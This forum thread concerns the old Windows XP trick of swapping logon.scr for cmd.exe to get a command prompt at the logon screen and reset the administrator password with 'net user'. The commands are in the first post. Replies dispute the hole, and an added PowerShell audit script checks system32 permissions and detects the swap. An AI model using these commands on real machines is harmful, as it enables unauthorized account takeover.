Another logon.scr Admin Hole + FIX

  1. #1

    Another logon.scr Admin Hole + FIX

    WOW windows sux.... Lol so many logon holes. Here is another.
    I believe that this is only for XP.
    I also believe that this is a very well known hole, but I decided to post it for the people who have never heard of it.

    How it works.
    When your PC is on a logon screen and nothing is done for 10-15 minutes, a LOGON SCREENSAVER is executed. What can happen is a user can replace that LOGON SCREENSAVER with the DOS PROMPT. What this will do is, instead of running the screensaver, it will display the command prompt. Through the prompt they can easily change the ADMIN password and log on under that name.

    HOW IT IS DONE
    RUN>>COMMAND
    C:\> cd \winnt\system32
    C:\winnt\system32> copy logon.scr logon.scr.old
    C:\winnt\system32> del logon.scr
    C:\winnt\system32> copy cmd.exe logon.scr

    Now all they would have to do is log off the machine, wait 10-15 minutes, then the DOS PROMPT should execute.
    Lastly all they have to do is type "C:\> net user administrator <newpassword> " in the prompt and log in with the new account.

    *FIX* Change the default permissions on C:\winnt and C:\winnt\system32 and you should be golden.

  2. #2
    Senior Member | Join Date: Jan 2002 | Posts: 1,207
    Firstly old news,
    Secondly it isn't a security hole.

    In order to replace logon.scr, you require admin rights, because the default ACL in Windows NT (and 2000, XP, etc.) only allows administrators and system write access.
    If you had admin rights, then you can obtain localsystem privileges easily anyway.

    So it just isn't an issue.

    Unless you're using FAT32. If that is the case however, there are probably easier ways of getting localsystem rights.

    Slarty
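
A defender-side check of the points raised in posts #1 and #2 (system32 permissions, the default ACL, the FAT32 caveat), added here as an example and not part of the thread. The helper name `Get-UntrustedWriteAce` and the trusted-SID list are assumptions; it expects PowerShell 4 or later for `Get-FileHash`.

```powershell
# Added audit example, not from the thread. Run in an elevated PowerShell 4+ session.
$trustedSids = @(
    'S-1-5-18',      # NT AUTHORITY\SYSTEM
    'S-1-5-32-544',  # BUILTIN\Administrators
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'  # NT SERVICE\TrustedInstaller
)
# Rights that let a principal replace, delete or re-permission a file,
# plus the raw GENERIC_ALL (0x10000000) and GENERIC_WRITE (0x40000000) bits.
$rights    = [System.Security.AccessControl.FileSystemRights]'Write, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
$writeMask = [int]$rights -bor 0x10000000 -bor 0x40000000

# Hypothetical helper: allow-ACEs on $Path that grant write-type access to
# anyone outside $trustedSids. Inherit-only ACEs do not apply to $Path itself.
function Get-UntrustedWriteAce {
    param([Parameter(Mandatory)][string]$Path)
    $sidType = [System.Security.Principal.SecurityIdentifier]
    (Get-Acl -LiteralPath $Path).GetAccessRules($true, $true, $sidType) | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights -band $writeMask) -ne 0) -and
        (([int]$_.PropagationFlags -band 2) -eq 0) -and   # 2 = InheritOnly
        ($trustedSids -notcontains $_.IdentityReference.Value)
    }
}

$sys32 = Join-Path $env:SystemRoot 'System32'
$saver = Join-Path $sys32 'logon.scr'
$cmd   = Join-Path $sys32 'cmd.exe'

# On FAT/FAT32 there are no ACLs, so the permission check below means nothing.
$fs = (New-Object System.IO.DriveInfo "$env:SystemDrive\").DriveFormat
if ($fs -ne 'NTFS') { Write-Warning "System drive is $fs; file ACLs are not enforced." }

foreach ($p in @($sys32, $saver)) {
    if (-not (Test-Path -LiteralPath $p)) { Write-Output "SKIP  $p (not present)"; continue }
    $bad = @(Get-UntrustedWriteAce -Path $p)
    if ($bad.Count -eq 0) { Write-Output "OK    $p" }
    foreach ($ace in $bad) {
        Write-Warning "$p writable by SID $($ace.IdentityReference.Value): $($ace.FileSystemRights)"
    }
}

# The swap described in post #1 leaves logon.scr byte-identical to cmd.exe.
if ((Test-Path -LiteralPath $saver) -and
    ((Get-FileHash -LiteralPath $saver).Hash -eq (Get-FileHash -LiteralPath $cmd).Hash)) {
    Write-Warning "$saver has the same SHA-256 as cmd.exe; restore the original screensaver."
}
```

The ACL check says nothing about offline modification from alternate boot media, which the later posts discuss.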

  3. #3
    nihil | Senior Member | Join Date: Jul 2003 | Location: United Kingdom: Bridlington | Posts: 17,190
    Szafran,

    With the greatest respect, windows does not suck!

    The truth is that the Earth sucks, and that gravity is a myth...........

    All operating systems have their flaws, but the worst flaws must be in the humans who find and exploit them?

    I guess if you can guarantee 5 minutes, either physical or firewall security should have caught it?

    That is where I feel that your security lies...you can only buy time...just like security on an automobile?

    just my 0.02 worth

  4. #4
    lol, I didn't mean it like that, sorry, I meant it's so much more unsecure than Linux. And the reason I posted it was because at my school you do not need ADMIN rights to change files such as LOGON.SCR if you boot with a floppy.

    so in response to
    Firstly old news,
    Secondly it isn't a security hole.
    It may not be new but it is still a security hole. And in case you missed my last message: if they boot with a floppy or CD in DOS then it is very possible to alter any file in the Windows DIR, including LOGON.SCR.

    PS thanx for the NEG Points

  5. #5
    Banned | Join Date: May 2003 | Posts: 1,004
    lol, I didn't mean it like that, sorry, I meant it's so much more unsecure than Linux.
    Just stop talking before I really start to flame you.

    I have read a few of your posts now and it is obvious that you are quite new to computers and computer security, so if you'd like to be welcome here I think you would do better _asking_ and not telling.

    catch

  6. #6
    Actually I'm quite fluent in computers, but my posts have been written so that the least fluent user can understand.

    And just to let everyone know, I just tried this on my other PC and it did work w/ a boot disk. So unless you have bootdisk disabled then you might want to look into this.

  7. #7
    Banned | Join Date: May 2003 | Posts: 1,004
    Your other post about any user being able to change the admin password belies your level of fluency.

    As for this one, if the system is improperly protected against alternate boots, this screen saver crap is the least of your worries.

    catch

  8. #8
    Well, the admin pass can be easily changed with the NET USER command.

  9. #9
    Banned | Join Date: Jul 2002 | Posts: 877
    Originally posted here by Szafran
    lol, I didn't mean it like that, sorry, I meant it's so much more unsecure than Linux.
    I have no problem with your personal feelings towards Windows and M$... But with this post however... actually you're wrong, especially considering probably about half of the Windows users out there are home users and there are many who know very little or nothing at all about their own computers. One of the main reasons it's such a popular target is because it's so widespread. Also what many people don't realize is Linux may not be the biggest target when it comes to virii, but what it lacks in that it makes up for with a fair share of exploits...

    Originally posted here by Szafran
    my posts have been written so that the least fluent user can understand.
    Is that an insult or just more excuses on your part?

  10. #10
    Senior Member | Join Date: Jan 2002 | Posts: 1,207
    It may not be new but it is still a security hole.
    No it is not.

    And in case you missed my last message: if they boot with a floppy or CD in DOS then it is very possible to alter any file in the Windows DIR, including LOGON.SCR.
    No, DOS does not understand NTFS, hence will not be able to see the NT partition at all. If you use FAT the system is inherently insecure, AS MICROSOFT FREELY ADMIT and thus don't recommend you use FAT on your system drive.

    Of course if you can boot off a CD or floppy full access is easily obtainable anyway, but I won't tell you how because you're a lamer.

    PS thanx for the NEG Points
    If you want to post up inaccurate duplicate out of date info, you should expect more

    Slarty
